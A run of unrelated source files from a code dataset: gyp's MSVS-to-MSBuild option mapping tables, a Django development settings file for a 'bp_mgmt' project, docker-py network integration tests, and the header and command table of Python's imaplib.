new=['Disabled'])) # /Ob0
_Same(_compile, 'Optimization',
_Enumeration(['Disabled', # /Od
'MinSpace', # /O1
'MaxSpeed', # /O2
'Full'])) # /Ox
_Same(_compile, 'RuntimeLibrary',
_Enumeration(['MultiThreaded', # /MT
'MultiThreadedDebug', # /MTd
'MultiThreadedDLL', # /MD
'MultiThreadedDebugDLL'])) # /MDd
_Same(_compile, 'StructMemberAlignment',
_Enumeration(['Default',
'1Byte', # /Zp1
'2Bytes', # /Zp2
'4Bytes', # /Zp4
'8Bytes', # /Zp8
'16Bytes'])) # /Zp16
_Same(_compile, 'WarningLevel',
_Enumeration(['TurnOffAllWarnings', # /W0
'Level1', # /W1
'Level2', # /W2
'Level3', # /W3
'Level4'], # /W4
new=['EnableAllWarnings'])) # /Wall
# Options found in MSVS that have been renamed in MSBuild.
_Renamed(_compile, 'EnableFunctionLevelLinking', 'FunctionLevelLinking',
_boolean) # /Gy
_Renamed(_compile, 'EnableIntrinsicFunctions', 'IntrinsicFunctions',
_boolean) # /Oi
_Renamed(_compile, 'KeepComments', 'PreprocessKeepComments', _boolean) # /C
_Renamed(_compile, 'ObjectFile', 'ObjectFileName', _file_name) # /Fo
_Renamed(_compile, 'OpenMP', 'OpenMPSupport', _boolean) # /openmp
_Renamed(_compile, 'PrecompiledHeaderThrough', 'PrecompiledHeaderFile',
_file_name) # Used with /Yc and /Yu
_Renamed(_compile, 'PrecompiledHeaderFile', 'PrecompiledHeaderOutputFile',
_file_name) # /Fp
_Renamed(_compile, 'UsePrecompiledHeader', 'PrecompiledHeader',
_Enumeration(['NotUsing', # VS recognized '' for this value too.
'Create', # /Yc
'Use'])) # /Yu
_Renamed(_compile, 'WarnAsError', 'TreatWarningAsError', _boolean) # /WX
_ConvertedToAdditionalOption(_compile, 'DefaultCharIsUnsigned', '/J')
# MSVS options not found in MSBuild.
_MSVSOnly(_compile, 'Detect64BitPortabilityProblems', _boolean)
_MSVSOnly(_compile, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_compile, 'BuildingInIDE', _boolean)
_MSBuildOnly(_compile, 'CompileAsManaged',
_Enumeration([], new=['false',
'true'])) # /clr
_MSBuildOnly(_compile, 'CreateHotpatchableImage', _boolean) # /hotpatch
_MSBuildOnly(_compile, 'MultiProcessorCompilation', _boolean) # /MP
_MSBuildOnly(_compile, 'PreprocessOutputPath', _string) # /Fi
_MSBuildOnly(_compile, 'ProcessorNumber', _integer) # the number of processors
_MSBuildOnly(_compile, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_compile, 'TreatSpecificWarningsAsErrors', _string_list) # /we
_MSBuildOnly(_compile, 'UseUnicodeForAssemblerListing', _boolean) # /FAu
# Defines a setting that needs very customized processing
_CustomGeneratePreprocessedFile(_compile, 'GeneratePreprocessedFile')
# Directives for converting MSVS VCLinkerTool to MSBuild Link.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\link.xml" for
# the schema of the MSBuild Link settings.
# Options that have the same name in MSVS and MSBuild
_Same(_link, 'AdditionalDependencies', _file_list)
_Same(_link, 'AdditionalLibraryDirectories', _folder_list) # /LIBPATH
# /MANIFESTDEPENDENCY:
_Same(_link, 'AdditionalManifestDependencies', _file_list)
_Same(_link, 'AdditionalOptions', _string_list)
_Same(_link, 'AddModuleNamesToAssembly', _file_list) # /ASSEMBLYMODULE
_Same(_link, 'AllowIsolation', _boolean) # /ALLOWISOLATION
_Same(_link, 'AssemblyLinkResource', _file_list) # /ASSEMBLYLINKRESOURCE
_Same(_link, 'BaseAddress', _string) # /BASE
_Same(_link, 'CLRUnmanagedCodeCheck', _boolean) # /CLRUNMANAGEDCODECHECK
_Same(_link, 'DelayLoadDLLs', _file_list) # /DELAYLOAD
_Same(_link, 'DelaySign', _boolean) # /DELAYSIGN
_Same(_link, 'EmbedManagedResourceFile', _file_list) # /ASSEMBLYRESOURCE
_Same(_link, 'EnableUAC', _boolean) # /MANIFESTUAC
_Same(_link, 'EntryPointSymbol', _string) # /ENTRY
_Same(_link, 'ForceSymbolReferences', _file_list) # /INCLUDE
_Same(_link, 'FunctionOrder', _file_name) # /ORDER
_Same(_link, 'GenerateDebugInformation', _boolean) # /DEBUG
_Same(_link, 'GenerateMapFile', _boolean) # /MAP
_Same(_link, 'HeapCommitSize', _string)
_Same(_link, 'HeapReserveSize', _string) # /HEAP
_Same(_link, 'IgnoreAllDefaultLibraries', _boolean) # /NODEFAULTLIB
_Same(_link, 'IgnoreEmbeddedIDL', _boolean) # /IGNOREIDL
_Same(_link, 'ImportLibrary', _file_name) # /IMPLIB
_Same(_link, 'KeyContainer', _file_name) # /KEYCONTAINER
_Same(_link, 'KeyFile', _file_name) # /KEYFILE
_Same(_link, 'ManifestFile', _file_name) # /ManifestFile
_Same(_link, 'MapExports', _boolean) # /MAPINFO:EXPORTS
_Same(_link, 'MapFileName', _file_name)
_Same(_link, 'MergedIDLBaseFileName', _file_name) # /IDLOUT
_Same(_link, 'MergeSections', _string) # /MERGE
_Same(_link, 'MidlCommandFile', _file_name) # /MIDL
_Same(_link, 'ModuleDefinitionFile', _file_name) # /DEF
_Same(_link, 'OutputFile', _file_name) # /OUT
_Same(_link, 'PerUserRedirection', _boolean)
_Same(_link, 'Profile', _boolean) # /PROFILE
_Same(_link, 'ProfileGuidedDatabase', _file_name) # /PGD
_Same(_link, 'ProgramDatabaseFile', _file_name) # /PDB
_Same(_link, 'RegisterOutput', _boolean)
_Same(_link, 'SetChecksum', _boolean) # /RELEASE
_Same(_link, 'StackCommitSize', _string)
_Same(_link, 'StackReserveSize', _string) # /STACK
_Same(_link, 'StripPrivateSymbols', _file_name) # /PDBSTRIPPED
_Same(_link, 'SupportUnloadOfDelayLoadedDLL', _boolean) # /DELAY:UNLOAD
_Same(_link, 'SuppressStartupBanner', _boolean) # /NOLOGO
_Same(_link, 'SwapRunFromCD', _boolean) # /SWAPRUN:CD
_Same(_link, 'TurnOffAssemblyGeneration', _boolean) # /NOASSEMBLY
_Same(_link, 'TypeLibraryFile', _file_name) # /TLBOUT
_Same(_link, 'TypeLibraryResourceID', _integer) # /TLBID
_Same(_link, 'UACUIAccess', _boolean) # /uiAccess='true'
_Same(_link, 'Version', _string) # /VERSION
_Same(_link, 'EnableCOMDATFolding', _newly_boolean) # /OPT:ICF
_Same(_link, 'FixedBaseAddress', _newly_boolean) # /FIXED
_Same(_link, 'LargeAddressAware', _newly_boolean) # /LARGEADDRESSAWARE
_Same(_link, 'OptimizeReferences', _newly_boolean) # /OPT:REF
_Same(_link, 'RandomizedBaseAddress', _newly_boolean) # /DYNAMICBASE
_Same(_link, 'TerminalServerAware', _newly_boolean) # /TSAWARE
_subsystem_enumeration = _Enumeration(
['NotSet',
'Console', # /SUBSYSTEM:CONSOLE
'Windows', # /SUBSYSTEM:WINDOWS
'Native', # /SUBSYSTEM:NATIVE
'EFI Application', # /SUBSYSTEM:EFI_APPLICATION
'EFI Boot Service Driver', # /SUBSYSTEM:EFI_BOOT_SERVICE_DRIVER
'EFI ROM', # /SUBSYSTEM:EFI_ROM
'EFI Runtime', # /SUBSYSTEM:EFI_RUNTIME_DRIVER
'WindowsCE'], # /SUBSYSTEM:WINDOWSCE
new=['POSIX']) # /SUBSYSTEM:POSIX
_target_machine_enumeration = _Enumeration(
['NotSet',
'MachineX86', # /MACHINE:X86
None,
'MachineARM', # /MACHINE:ARM
'MachineEBC', # /MACHINE:EBC
'MachineIA64', # /MACHINE:IA64
None,
'MachineMIPS', # /MACHINE:MIPS
'MachineMIPS16', # /MACHINE:MIPS16
'MachineMIPSFPU', # /MACHINE:MIPSFPU
'MachineMIPSFPU16', # /MACHINE:MIPSFPU16
None,
None,
None,
'MachineSH4', # /MACHINE:SH4
None,
'MachineTHUMB', # /MACHINE:THUMB
'MachineX64']) # /MACHINE:X64
_Same(_link, 'AssemblyDebug',
_Enumeration(['',
'true', # /ASSEMBLYDEBUG
'false'])) # /ASSEMBLYDEBUG:DISABLE
_Same(_link, 'CLRImageType',
_Enumeration(['Default',
'ForceIJWImage', # /CLRIMAGETYPE:IJW
'ForcePureILImage', # /Switch="CLRIMAGETYPE:PURE
'ForceSafeILImage'])) # /Switch="CLRIMAGETYPE:SAFE
_Same(_link, 'CLRThreadAttribute',
_Enumeration(['DefaultThreadingAttribute', # /CLRTHREADATTRIBUTE:NONE
'MTAThreadingAttribute', # /CLRTHREADATTRIBUTE:MTA
'STAThreadingAttribute'])) # /CLRTHREADATTRIBUTE:STA
_Same(_link, 'DataExecutionPrevention',
_Enumeration(['',
'false', # /NXCOMPAT:NO
'true'])) # /NXCOMPAT
_Same(_link, 'Driver',
_Enumeration(['NotSet',
'Driver', # /Driver
'UpOnly', # /DRIVER:UPONLY
'WDM'])) # /DRIVER:WDM
_Same(_link, 'LinkTimeCodeGeneration',
_Enumeration(['Default',
'UseLinkTimeCodeGeneration', # /LTCG
'PGInstrument', # /LTCG:PGInstrument
'PGOptimization', # /LTCG:PGOptimize
'PGUpdate'])) # /LTCG:PGUpdate
_Same(_link, 'ShowProgress',
_Enumeration(['NotSet',
'LinkVerbose', # /VERBOSE
'LinkVerboseLib'], # /VERBOSE:Lib
new=['LinkVerboseICF', # /VERBOSE:ICF
'LinkVerboseREF', # /VERBOSE:REF
'LinkVerboseSAFESEH', # /VERBOSE:SAFESEH
'LinkVerboseCLR'])) # /VERBOSE:CLR
_Same(_link, 'SubSystem', _subsystem_enumeration)
_Same(_link, 'TargetMachine', _target_machine_enumeration)
_Same(_link, 'UACExecutionLevel',
_Enumeration(['AsInvoker', # /level='asInvoker'
'HighestAvailable', # /level='highestAvailable'
'RequireAdministrator'])) # /level='requireAdministrator'
_Same(_link, 'MinimumRequiredVersion', _string)
_Same(_link, 'TreatLinkerWarningAsErrors', _boolean) # /WX
# Options found in MSVS that have been renamed in MSBuild.
_Renamed(_link, 'ErrorReporting', 'LinkErrorReporting',
_Enumeration(['NoErrorReport', # /ERRORREPORT:NONE
'PromptImmediately', # /ERRORREPORT:PROMPT
'QueueForNextLogin'], # /ERRORREPORT:QUEUE
new=['SendErrorReport'])) # /ERRORREPORT:SEND
_Renamed(_link, 'IgnoreDefaultLibraryNames', 'IgnoreSpecificDefaultLibraries',
_file_list) # /NODEFAULTLIB
_Renamed(_link, 'ResourceOnlyDLL', 'NoEntryPoint', _boolean) # /NOENTRY
_Renamed(_link, 'SwapRunFromNet', 'SwapRunFromNET', _boolean) # /SWAPRUN:NET
_Moved(_link, 'GenerateManifest', '', _boolean)
_Moved(_link, 'IgnoreImportLibrary', '', _boolean)
_Moved(_link, 'LinkIncremental', '', _newly_boolean)
_Moved(_link, 'LinkLibraryDependencies', 'ProjectReference', _boolean)
_Moved(_link, 'UseLibraryDependencyInputs', 'ProjectReference', _boolean)
# MSVS options not found in MSBuild.
_MSVSOnly(_link, 'OptimizeForWindows98', _newly_boolean)
_MSVSOnly(_link, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_link, 'BuildingInIDE', _boolean)
_MSBuildOnly(_link, 'ImageHasSafeExceptionHandlers', _boolean) # /SAFESEH
_MSBuildOnly(_link, 'LinkDLL', _boolean) # /DLL Visible='false'
_MSBuildOnly(_link, 'LinkStatus', _boolean) # /LTCG:STATUS
_MSBuildOnly(_link, 'PreventDllBinding', _boolean) # /ALLOWBIND
_MSBuildOnly(_link, 'SupportNobindOfDelayLoadedDLL', _boolean) # /DELAY:NOBIND
_MSBuildOnly(_link, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_link, 'MSDOSStubFileName', _file_name) # /STUB Visible='false'
_MSBuildOnly(_link, 'SectionAlignment', _integer) # /ALIGN
_MSBuildOnly(_link, 'SpecifySectionAttributes', _string) # /SECTION
_MSBuildOnly(_link, 'ForceFileOutput',
_Enumeration([], new=['Enabled', # /FORCE
# /FORCE:MULTIPLE
'MultiplyDefinedSymbolOnly',
'UndefinedSymbolOnly'])) # /FORCE:UNRESOLVED
_MSBuildOnly(_link, 'CreateHotPatchableImage',
_Enumeration([], new=['Enabled', # /FUNCTIONPADMIN
'X86Image', # /FUNCTIONPADMIN:5
'X64Image', # /FUNCTIONPADMIN:6
'ItaniumImage'])) # /FUNCTIONPADMIN:16
_MSBuildOnly(_link, 'CLRSupportLastError',
_Enumeration([], new=['Enabled', # /CLRSupportLastError
'Disabled', # /CLRSupportLastError:NO
# /CLRSupportLastError:SYSTEMDLL
'SystemDlls']))
# Directives for converting VCResourceCompilerTool to ResourceCompile.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\rc.xml" for
# the schema of the MSBuild ResourceCompile settings.
_Same(_rc, 'AdditionalOptions', _string_list)
_Same(_rc, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_rc, 'Culture', _Integer(msbuild_base=16))
_Same(_rc, 'IgnoreStandardIncludePath', _boolean) # /X
_Same(_rc, 'PreprocessorDefinitions', _string_list) # /D
_Same(_rc, 'ResourceOutputFileName', _string) # /fo
_Same(_rc, 'ShowProgress', _boolean) # /v
# There is no UI in VisualStudio 2008 to set the following properties.
# However they are found in CL and other tools. Include them here for
# completeness, as they are very likely to have the same usage pattern.
_Same(_rc, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_rc, 'UndefinePreprocessorDefinitions', _string_list) # /u
# MSBuild options not found in MSVS.
_MSBuildOnly(_rc, 'NullTerminateStrings', _boolean) # /n
_MSBuildOnly(_rc, 'TrackerLogDirectory', _folder_name)
# Directives for converting VCMIDLTool to Midl.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\midl.xml" for
# the schema of the MSBuild Midl settings.
_Same(_midl, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_midl, 'AdditionalOptions', _string_list)
_Same(_midl, 'CPreprocessOptions', _string) # /cpp_opt
_Same(_midl, 'ErrorCheckAllocations', _boolean) # /error allocation
_Same(_midl, 'ErrorCheckBounds', _boolean) # /error bounds_check
_Same(_midl, 'ErrorCheckEnumRange', _boolean) # /error enum
_Same(_midl, 'ErrorCheckRefPointers', _boolean) # /error ref
_Same(_midl, 'ErrorCheckStubData', _boolean) # /error stub_data
_Same(_midl, 'GenerateStublessProxies', _boolean) # /Oicf
_Same(_midl, 'GenerateTypeLibrary', _boolean)
_Same(_midl, 'HeaderFileName', _file_name) # /h
_Same(_midl, 'IgnoreStandardIncludePath', _boolean) # /no_def_idir
_Same(_midl, 'InterfaceIdentifierFileName', _file_name) # /iid
_Same(_midl, 'MkTypLibCompatible', _boolean) # /mktyplib203
_Same(_midl, 'OutputDirectory', _string) # /out
_Same(_midl, 'PreprocessorDefinitions', _string_list) # /D
_Same(_midl, 'ProxyFileName', _file_name) # /proxy
_Same(_midl, 'RedirectOutputAndErrors', _file_name) # /o
_Same(_midl, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_midl, 'TypeLibraryName', _file_name) # /tlb
_Same(_midl, 'UndefinePreprocessorDefinitions', _string_list) # /U
_Same(_midl, 'WarnAsError', _boolean) # /WX
_Same(_midl, 'DefaultCharType',
_Enumeration(['Unsigned', # /char unsigned
'Signed', # /char signed
'Ascii'])) # /char ascii7
_Same(_midl, 'TargetEnvironment',
_Enumeration(['NotSet',
'Win32', # /env win32
'Itanium', # /env ia64
'X64'])) # /env x64
_Same(_midl, 'EnableErrorChecks',
_Enumeration(['EnableCustom',
'None', # /error none
'All'])) # /error all
_Same(_midl, 'StructMemberAlignment',
_Enumeration(['NotSet',
'1', # Zp1
'2', # Zp2
'4', # Zp4
'8'])) # Zp8
_Same(_midl, 'WarningLevel',
_Enumeration(['0', # /W0
'1', # /W1
'2', # /W2
'3', # /W3
'4'])) # /W4
_Renamed(_midl, 'DLLDataFileName', 'DllDataFileName', _file_name) # /dlldata
_Renamed(_midl, 'ValidateParameters', 'ValidateAllParameters',
_boolean) # /robust
# MSBuild options not found in MSVS.
_MSBuildOnly(_midl, 'ApplicationConfigurationMode', _boolean) # /app_config
_MSBuildOnly(_midl, 'ClientStubFile', _file_name) # /cstub
_MSBuildOnly(_midl, 'GenerateClientFiles',
_Enumeration([], new=['Stub', # /client stub
'None'])) # /client none
_MSBuildOnly(_midl, 'GenerateServerFiles',
_Enumeration([], new=['Stub', # /client stub
'None'])) # /client none
_MSBuildOnly(_midl, 'LocaleID', _integer) # /lcid DECIMAL
_MSBuildOnly(_midl, 'ServerStubFile', _file_name) # /sstub
_MSBuildOnly(_midl, 'SuppressCompilerWarnings', _boolean) # /no_warn
_MSBuildOnly(_midl, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_midl, 'TypeLibFormat',
_Enumeration([], new=['NewFormat', # /newtlb
'OldFormat'])) # /oldtlb
# Directives for converting VCLibrarianTool to Lib.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\lib.xml" for
# the schema of the MSBuild Lib settings.
_Same(_lib, 'AdditionalDependencies', _file_list)
_Same(_lib, 'AdditionalLibraryDirectories', _folder_list) # /LIBPATH
_Same(_lib, 'AdditionalOptions', _string_list)
_Same(_lib, 'ExportNamedFunctions', _string_list) # /EXPORT
_Same(_lib, 'ForceSymbolReferences', _string) # /INCLUDE
_Same(_lib, 'IgnoreAllDefaultLibraries', _boolean) # /NODEFAULTLIB
_Same(_lib, 'IgnoreSpecificDefaultLibraries', _file_list) # /NODEFAULTLIB
_Same(_lib, 'ModuleDefinitionFile', _file_name) # /DEF
_Same(_lib, 'OutputFile', _file_name) # /OUT
_Same(_lib, 'SuppressStartupBanner', _boolean) # /NOLOGO
_Same(_lib, 'UseUnicodeResponseFiles', _boolean)
_Same(_lib, 'LinkTimeCodeGeneration', _boolean) # /LTCG
_Same(_lib, 'TargetMachine', _target_machine_enumeration)
# TODO(jeanluc) _link defines the same value that gets moved to
# ProjectReference. We may want to validate that they are consistent.
_Moved(_lib, 'LinkLibraryDependencies', 'ProjectReference', _boolean)
_MSBuildOnly(_lib, 'DisplayLibrary', _string) # /LIST Visible='false'
_MSBuildOnly(_lib, 'ErrorReporting',
_Enumeration([], new=['PromptImmediately', # /ERRORREPORT:PROMPT
'QueueForNextLogin', # /ERRORREPORT:QUEUE
'SendErrorReport', # /ERRORREPORT:SEND
'NoErrorReport'])) # /ERRORREPORT:NONE
_MSBuildOnly(_lib, 'MinimumRequiredVersion', _string)
_MSBuildOnly(_lib, 'Name', _file_name) # /NAME
_MSBuildOnly(_lib, 'RemoveObjects', _file_list) # /REMOVE
_MSBuildOnly(_lib, 'SubSystem', _subsystem_enumeration)
_MSBuildOnly(_lib, 'TrackerLogDirectory', _folder_name)
_MSBuildOnly(_lib, 'TreatLibWarningAsErrors', _boolean) # /WX
_MSBuildOnly(_lib, 'Verbose', _boolean)
# Directives for converting VCManifestTool to Mt.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\mt.xml" for
# the schema of the MSBuild Lib settings.
# Options that have the same name in MSVS and MSBuild
_Same(_manifest, 'AdditionalManifestFiles', _file_list) # /manifest
_Same(_manifest, 'AdditionalOptions', _string_list)
_Same(_manifest, 'AssemblyIdentity', _string) # /identity:
_Same(_manifest, 'ComponentFileName', _file_name) # /dll
_Same(_manifest, 'GenerateCatalogFiles', _boolean) # /makecdfs
_Same(_manifest, 'InputResourceManifests', _string) # /inputresource
_Same(_manifest, 'OutputManifestFile', _file_name) # /out
_Same(_manifest, 'RegistrarScriptFile', _file_name) # /rgs
_Same(_manifest, 'ReplacementsFile', _file_name) # /replacements
_Same(_manifest, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_manifest, 'TypeLibraryFile', _file_name) # /tlb:
_Same(_manifest, 'UpdateFileHashes', _boolean) # /hashupdate
_Same(_manifest, 'UpdateFileHashesSearchPath', _file_name)
_Same(_manifest, 'VerboseOutput', _boolean) # /verbose
# Options that have moved location.
_MovedAndRenamed(_manifest, 'ManifestResourceFile',
'ManifestResourceCompile',
'ResourceOutputFileName',
_file_name)
_Moved(_manifest, 'EmbedManifest', '', _boolean)
# MSVS options not found in MSBuild.
_MSVSOnly(_manifest, 'DependencyInformationFile', _file_name)
_MSVSOnly(_manifest, 'UseFAT32Workaround', _boolean)
_MSVSOnly(_manifest, 'UseUnicodeResponseFiles', _boolean)
# MSBuild options not found in MSVS.
_MSBuildOnly(_manifest, 'EnableDPIAwareness', _boolean)
_MSBuildOnly(_manifest, 'GenerateCategoryTags', _boolean) # /category
_MSBuildOnly(_manifest, 'ManifestFromManagedAssembly',
_file_name) # /managedassemblyname
_MSBuildOnly(_manifest, 'OutputResourceManifests', _string) # /outputresource
_MSBuildOnly(_manifest, 'SuppressDependencyElement', _boolean) # /nodependency
_MSBuildOnly(_manifest, 'TrackerLogDirectory', _folder_name)
# Directives for MASM.
# See "$(VCTargetsPath)\BuildCustomizations\masm.xml" for the schema of the
# MSBuild MASM settings.
# Options that have the same name in MSVS and MSBuild.
_Same(_masm, 'UseSafeExceptionHandlers', _boolean) # /safeseh
| gpl-3.0 |
hutchison/bp_mgmt | bp_mgmt/settings.py | 1 | 5012 | """
Django settings for bp_mgmt project.
Generated by 'django-admin startproject' using Django 1.8.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
GIT_DIR = BASE_DIR
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Generate a new secret key by executing this in a Python-Shell:
# >>> import random, string
# >>> "".join([random.SystemRandom().choice(
# string.digits + string.ascii_letters + string.punctuation
# ) for i in range(50)])
SECRET_KEY = ' '
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.flatpages',
'bp_cupid',
'bp_setup',
'kombu.transport.django',
'djcelery',
'actstream',
'django_ace',
'rest_framework',
'simple_history',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'simple_history.middleware.HistoryRequestMiddleware',
)
if DEBUG:
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
AUTH_LDAP_URI = ''
AUTH_LDAP_BASE_DN = ''
else:
AUTHENTICATION_BACKENDS = (
'django_auth_ldap3.backends.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
# TODO: change this accordingly to your needs:
AUTH_LDAP_URI = ''
AUTH_LDAP_BASE_DN = ''
SITE_ID = 1
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
ROOT_URLCONF = 'bp_mgmt.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'bp_mgmt.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': '/var/tmp/django_cache',
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'de-de'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# https://docs.djangoproject.com/en/1.8/ref/settings/#std:setting-MESSAGE_TAGS
from django.contrib.messages import constants as message_constants
MESSAGE_TAGS = {
message_constants.ERROR: 'danger'
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
LOGIN_URL = '/login'
LOGIN_REDIRECT_URL = '/'
# Celery stuff:
BROKER_URL = 'django://'
CELERY_RESULT_BACKEND='djcelery.backends.database:DatabaseBackend'
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
}
},
'loggers': {
'django': {
'handlers': ['console'],
'propagate': True,
'level':'INFO',
},
'bp_cupid': {
'handlers': ['console'],
'level': 'DEBUG',
},
'bp_setup': {
'handlers': ['console'],
'level': 'DEBUG',
},
'django_auth_ldap3': {
'handlers': ['console'],
'level': 'DEBUG',
},
},
}
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.IsAdminUser'
]
}
| agpl-3.0 |
rhatdan/docker-py | tests/integration/network_test.py | 1 | 3554 | import random
import docker
import pytest
from .. import helpers
from ..base import requires_api_version
@requires_api_version('1.21')
class TestNetworks(helpers.BaseTestCase):
def create_network(self, *args, **kwargs):
net_name = u'dockerpy{}'.format(random.getrandbits(24))[:14]
net_id = self.client.create_network(net_name, *args, **kwargs)['Id']
self.tmp_networks.append(net_id)
return (net_name, net_id)
def test_list_networks(self):
networks = self.client.networks()
initial_size = len(networks)
net_name, net_id = self.create_network()
networks = self.client.networks()
self.assertEqual(len(networks), initial_size + 1)
self.assertTrue(net_id in [n['Id'] for n in networks])
networks_by_name = self.client.networks(names=[net_name])
self.assertEqual([n['Id'] for n in networks_by_name], [net_id])
networks_by_partial_id = self.client.networks(ids=[net_id[:8]])
self.assertEqual([n['Id'] for n in networks_by_partial_id], [net_id])
def test_inspect_network(self):
net_name, net_id = self.create_network()
net = self.client.inspect_network(net_id)
self.assertEqual(net['Id'], net_id)
self.assertEqual(net['Name'], net_name)
self.assertEqual(net['Driver'], 'bridge')
self.assertEqual(net['Scope'], 'local')
self.assertEqual(net['IPAM']['Driver'], 'default')
def test_create_network_with_host_driver_fails(self):
net_name = 'dockerpy{}'.format(random.getrandbits(24))[:14]
with pytest.raises(docker.errors.APIError):
self.client.create_network(net_name, driver='host')
def test_remove_network(self):
initial_size = len(self.client.networks())
net_name, net_id = self.create_network()
self.assertEqual(len(self.client.networks()), initial_size + 1)
self.client.remove_network(net_id)
self.assertEqual(len(self.client.networks()), initial_size)
def test_connect_and_disconnect_container(self):
net_name, net_id = self.create_network()
container = self.client.create_container('busybox', 'top')
self.tmp_containers.append(container)
self.client.start(container)
network_data = self.client.inspect_network(net_id)
self.assertFalse(network_data.get('Containers'))
self.client.connect_container_to_network(container, net_id)
network_data = self.client.inspect_network(net_id)
self.assertEqual(
list(network_data['Containers'].keys()),
[container['Id']])
self.client.disconnect_container_from_network(container, net_id)
network_data = self.client.inspect_network(net_id)
self.assertFalse(network_data.get('Containers'))
def test_connect_on_container_create(self):
net_name, net_id = self.create_network()
container = self.client.create_container(
image='busybox',
command='top',
host_config=self.client.create_host_config(network_mode=net_name),
)
self.tmp_containers.append(container)
self.client.start(container)
network_data = self.client.inspect_network(net_id)
self.assertEqual(
list(network_data['Containers'].keys()),
[container['Id']])
self.client.disconnect_container_from_network(container, net_id)
network_data = self.client.inspect_network(net_id)
self.assertFalse(network_data.get('Containers'))
| apache-2.0 |
837468220/python-for-android | python3-alpha/python3-src/Lib/imaplib.py | 46 | 48132 | """IMAP4 client.
Based on RFC 2060.
Public class: IMAP4
Public variable: Debug
Public functions: Internaldate2tuple
Int2AP
ParseFlags
Time2Internaldate
"""
# Author: Piers Lauder <piers@cs.su.oz.au> December 1997.
#
# Authentication code contributed by Donn Cave <donn@u.washington.edu> June 1998.
# String method conversion by ESR, February 2001.
# GET/SETACL contributed by Anthony Baxter <anthony@interlink.com.au> April 2001.
# IMAP4_SSL contributed by Tino Lange <Tino.Lange@isg.de> March 2002.
# GET/SETQUOTA contributed by Andreas Zeidler <az@kreativkombinat.de> June 2002.
# PROXYAUTH contributed by Rick Holbert <holbert.13@osu.edu> November 2002.
# GET/SETANNOTATION contributed by Tomas Lindroos <skitta@abo.fi> June 2005.
__version__ = "2.58"
import binascii, errno, random, re, socket, subprocess, sys, time
try:
import ssl
HAVE_SSL = True
except ImportError:
HAVE_SSL = False
__all__ = ["IMAP4", "IMAP4_stream", "Internaldate2tuple",
"Int2AP", "ParseFlags", "Time2Internaldate"]
# Globals
CRLF = b'\r\n'
Debug = 0
IMAP4_PORT = 143
IMAP4_SSL_PORT = 993
AllowedVersions = ('IMAP4REV1', 'IMAP4') # Most recent first
# Commands
Commands = {
# name valid states
'APPEND': ('AUTH', 'SELECTED'),
'AUTHENTICATE': ('NONAUTH',),
'CAPABILITY': ('NONAUTH', 'AUTH', 'SELECTED', 'LOGOUT'),
'CHECK': ('SELECTED',),
'CLOSE': ('SELECTED',),
'COPY': ('SELECTED',),
'CREATE': ('AUTH', 'SELECTED'),
'DELETE': ('AUTH', 'SELECTED'),
'DELETEACL': ('AUTH', 'SELECTED'),
'EXAMINE': ('AUTH', 'SELECTED'),
